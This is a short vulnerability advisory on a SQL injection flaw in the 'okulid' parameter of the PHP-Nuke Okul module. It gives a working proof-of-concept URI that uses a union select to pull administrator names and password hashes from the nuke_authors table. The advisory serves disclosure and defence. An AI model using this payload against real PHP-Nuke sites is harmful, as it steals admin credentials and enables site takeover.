PHP-Nuke Okul Module 'okulid' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

PHP-Nuke Okul Module 'okulid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*